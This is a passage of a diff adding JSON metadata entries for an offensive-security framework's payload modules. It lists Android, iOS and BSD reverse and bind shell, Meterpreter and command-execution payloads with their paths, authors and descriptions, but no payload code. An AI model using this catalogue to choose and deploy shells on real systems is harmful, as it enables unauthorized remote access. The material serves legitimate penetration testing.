+ "fullname": "payload/android/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [], + "description": "Connect back to attacker and spawn a Meterpreter shell", + "references": [], + "platform": "Android", + "arch": "dalvik", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/android/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "android/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_android/meterpreter_reverse_https": { + "name": "Android Meterpreter Shell, Reverse HTTPS Inline", + "fullname": "payload/android/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [], + "description": "Connect back to attacker and spawn a Meterpreter shell", + "references": [], + "platform": "Android", + "arch": "dalvik", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/android/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "android/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_android/meterpreter_reverse_tcp": { + "name": "Android Meterpreter Shell, Reverse TCP Inline", + "fullname": "payload/android/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [], + "description": "Connect back to the attacker and spawn a Meterpreter shell", + "references": 
[], + "platform": "Android", + "arch": "dalvik", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/android/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "android/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_android/shell/reverse_http": { + "name": "Command Shell, Android Reverse HTTP Stager", + "fullname": "payload/android/shell/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mihi", + "egypt ", + "anwarelmakrahy", + "OJ Reeves" + ], + "description": "Spawn a piped command shell (sh).\n\nTunnel communication over HTTP", + "references": [], + "platform": "Android", + "arch": "dalvik", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/android/reverse_http.rb", + "is_install_path": true, + "ref_name": "android/shell/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "android/shell", + "stager_refname": "android/reverse_http" + }, + "payload_android/shell/reverse_https": { + "name": "Command Shell, Android Reverse HTTPS Stager", + "fullname": "payload/android/shell/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mihi", + "egypt ", + "anwarelmakrahy", + "OJ Reeves" + ], + "description": "Spawn a piped command shell (sh).\n\nTunnel communication over HTTPS", + "references": [], + "platform": "Android", + "arch": "dalvik", + "rport": null, + 
"autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/android/reverse_https.rb", + "is_install_path": true, + "ref_name": "android/shell/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "android/shell", + "stager_refname": "android/reverse_https" + }, + "payload_android/shell/reverse_tcp": { + "name": "Command Shell, Android Reverse TCP Stager", + "fullname": "payload/android/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mihi", + "egypt " + ], + "description": "Spawn a piped command shell (sh).\n\nConnect back stager", + "references": [], + "platform": "Android", + "arch": "dalvik", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/android/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "android/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "android/shell", + "stager_refname": "android/reverse_tcp" + }, + "payload_apple_ios/aarch64/meterpreter_reverse_http": { + "name": "Apple_iOS Meterpreter, Reverse HTTP Inline", + "fullname": "payload/apple_ios/aarch64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Apple_iOS", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": 
null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "apple_ios/aarch64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_apple_ios/aarch64/meterpreter_reverse_https": { + "name": "Apple_iOS Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/apple_ios/aarch64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Apple_iOS", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "apple_ios/aarch64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_apple_ios/aarch64/meterpreter_reverse_tcp": { + "name": "Apple_iOS Meterpreter, Reverse TCP Inline", + "fullname": "payload/apple_ios/aarch64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Apple_iOS", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + 
"path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "apple_ios/aarch64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_apple_ios/aarch64/shell_reverse_tcp": { + "name": "Apple iOS aarch64 Command Shell, Reverse TCP Inline", + "fullname": "payload/apple_ios/aarch64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "Apple_iOS", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "apple_ios/aarch64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_apple_ios/armle/meterpreter_reverse_http": { + "name": "Apple_iOS Meterpreter, Reverse HTTP Inline", + "fullname": "payload/apple_ios/armle/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Apple_iOS", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": 
"apple_ios/armle/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_apple_ios/armle/meterpreter_reverse_https": { + "name": "Apple_iOS Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/apple_ios/armle/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Apple_iOS", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "apple_ios/armle/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_apple_ios/armle/meterpreter_reverse_tcp": { + "name": "Apple_iOS Meterpreter, Reverse TCP Inline", + "fullname": "payload/apple_ios/armle/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Apple_iOS", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "apple_ios/armle/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + 
"default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/sparc/shell_bind_tcp": { + "name": "BSD Command Shell, Bind TCP Inline", + "fullname": "payload/bsd/sparc/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "BSD", + "arch": "sparc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/sparc/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/sparc/shell_reverse_tcp": { + "name": "BSD Command Shell, Reverse TCP Inline", + "fullname": "payload/bsd/sparc/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "BSD", + "arch": "sparc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/sparc/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/vax/shell_reverse_tcp": { + "name": "BSD Command Shell, Reverse TCP Inline", + "fullname": "payload/bsd/vax/shell_reverse_tcp", + "aliases": [], + "rank": 
300, + "disclosure_date": null, + "type": "payload", + "author": [ + "wvu " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "BSD", + "arch": "vax", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/vax/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/vax/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x64/exec": { + "name": "BSD x64 Execute Command", + "fullname": "payload/bsd/x64/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "joev " + ], + "description": "Execute an arbitrary command", + "references": [], + "platform": "BSD", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x64/exec.rb", + "is_install_path": true, + "ref_name": "bsd/x64/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x64/shell_bind_ipv6_tcp": { + "name": "BSD x64 Command Shell, Bind TCP Inline (IPv6)", + "fullname": "payload/bsd/x64/shell_bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Balazs Bucsay @xoreipeip " + ], + "description": "Listen for a connection and spawn a command shell over IPv6", + "references": [ + "URL-https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_ipv6_bind_tcp.asm.c" + ], + "platform": "BSD", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + 
"autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/x64/shell_bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x64/shell_bind_tcp": { + "name": "BSD x64 Shell Bind TCP", + "fullname": "payload/bsd/x64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "nemo ", + "joev " + ], + "description": "Bind an arbitrary command to an arbitrary port", + "references": [], + "platform": "BSD", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x64/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/x64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x64/shell_bind_tcp_small": { + "name": "BSD x64 Command Shell, Bind TCP Inline", + "fullname": "payload/bsd/x64/shell_bind_tcp_small", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Balazs Bucsay @xoreipeip " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [ + "URL-https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_bind_tcp.asm.c" + ], + "platform": "BSD", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb", + "is_install_path": true, + "ref_name": 
"bsd/x64/shell_bind_tcp_small", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x64/shell_reverse_ipv6_tcp": { + "name": "BSD x64 Command Shell, Reverse TCP Inline (IPv6)", + "fullname": "payload/bsd/x64/shell_reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Balazs Bucsay @xoreipeip " + ], + "description": "Connect back to attacker and spawn a command shell over IPv6", + "references": [ + "URL-https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_ipv6_reverse_tcp.asm.c" + ], + "platform": "BSD", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/x64/shell_reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x64/shell_reverse_tcp": { + "name": "BSD x64 Shell Reverse TCP", + "fullname": "payload/bsd/x64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "nemo ", + "joev " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "BSD", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/x64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": 
false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x64/shell_reverse_tcp_small": { + "name": "BSD x64 Command Shell, Reverse TCP Inline", + "fullname": "payload/bsd/x64/shell_reverse_tcp_small", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Balazs Bucsay @xoreipeip " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [ + "URL-https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_reverse_tcp.asm.c" + ], + "platform": "BSD", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb", + "is_install_path": true, + "ref_name": "bsd/x64/shell_reverse_tcp_small", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x86/exec": { + "name": "BSD Execute Command", + "fullname": "payload/bsd/x86/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "snagg ", + "argp ", + "joev " + ], + "description": "Execute an arbitrary command", + "references": [], + "platform": "BSD", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x86/exec.rb", + "is_install_path": true, + "ref_name": "bsd/x86/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x86/metsvc_bind_tcp": { + "name": "FreeBSD Meterpreter Service, Bind TCP", + "fullname": "payload/bsd/x86/metsvc_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, 
+ "type": "payload", + "author": [ + "hdm " + ], + "description": "Stub payload for interacting with a Meterpreter Service", + "references": [], + "platform": "BSD", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/x86/metsvc_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x86/metsvc_reverse_tcp": { + "name": "FreeBSD Meterpreter Service, Reverse TCP Inline", + "fullname": "payload/bsd/x86/metsvc_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Stub payload for interacting with a Meterpreter Service", + "references": [], + "platform": "BSD", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/x86/metsvc_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x86/shell/bind_ipv6_tcp": { + "name": "BSD Command Shell, Bind TCP Stager (IPv6)", + "fullname": "payload/bsd/x86/shell/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "vlad902 ", + "hdm " + ], + "description": "Spawn a command shell (staged).\n\nListen for a connection over IPv6", + "references": [], + "platform": "BSD", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": 
null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/x86/shell/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "bsd/x86/shell", + "stager_refname": "bsd/x86/bind_ipv6_tcp" + }, + "payload_bsd/x86/shell/bind_tcp": { + "name": "BSD Command Shell, Bind TCP Stager", + "fullname": "payload/bsd/x86/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape " + ], + "description": "Spawn a command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "BSD", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/bsd/x86/bind_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/x86/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "bsd/x86/shell", + "stager_refname": "bsd/x86/bind_tcp" + }, + "payload_bsd/x86/shell/find_tag": { + "name": "BSD Command Shell, Find Tag Stager", + "fullname": "payload/bsd/x86/shell/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape " + ], + "description": "Spawn a command shell (staged).\n\nUse an established connection", + "references": [], + "platform": "BSD", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/bsd/x86/find_tag.rb", + "is_install_path": true, + "ref_name": 
"bsd/x86/shell/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "bsd/x86/shell", + "stager_refname": "bsd/x86/find_tag" + }, + "payload_bsd/x86/shell/reverse_ipv6_tcp": { + "name": "BSD Command Shell, Reverse TCP Stager (IPv6)", + "fullname": "payload/bsd/x86/shell/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "vlad902 ", + "hdm " + ], + "description": "Spawn a command shell (staged).\n\nConnect back to the attacker over IPv6", + "references": [], + "platform": "BSD", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/x86/shell/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "bsd/x86/shell", + "stager_refname": "bsd/x86/reverse_ipv6_tcp" + }, + "payload_bsd/x86/shell/reverse_tcp": { + "name": "BSD Command Shell, Reverse TCP Stager", + "fullname": "payload/bsd/x86/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape " + ], + "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "BSD", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/bsd/x86/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/x86/shell/reverse_tcp", + "check": false, + "post_auth": false, + 
"default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "bsd/x86/shell", + "stager_refname": "bsd/x86/reverse_tcp" + }, + "payload_bsd/x86/shell_bind_tcp": { + "name": "BSD Command Shell, Bind TCP Inline", + "fullname": "payload/bsd/x86/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "BSD", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/x86/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x86/shell_bind_tcp_ipv6": { + "name": "BSD Command Shell, Bind TCP Inline (IPv6)", + "fullname": "payload/bsd/x86/shell_bind_tcp_ipv6", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "vlad902 ", + "hdm " + ], + "description": "Listen for a connection and spawn a command shell over IPv6", + "references": [], + "platform": "BSD", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb", + "is_install_path": true, + "ref_name": "bsd/x86/shell_bind_tcp_ipv6", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x86/shell_find_port": { + "name": "BSD Command 
Shell, Find Port Inline", + "fullname": "payload/bsd/x86/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Spawn a shell on an established connection", + "references": [], + "platform": "BSD", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x86/shell_find_port.rb", + "is_install_path": true, + "ref_name": "bsd/x86/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x86/shell_find_tag": { + "name": "BSD Command Shell, Find Tag Inline", + "fullname": "payload/bsd/x86/shell_find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape " + ], + "description": "Spawn a shell on an established connection (proxy/NAT safe)", + "references": [], + "platform": "BSD", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x86/shell_find_tag.rb", + "is_install_path": true, + "ref_name": "bsd/x86/shell_find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x86/shell_reverse_tcp": { + "name": "BSD Command Shell, Reverse TCP Inline", + "fullname": "payload/bsd/x86/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "BSD", + "arch": "x86", + 
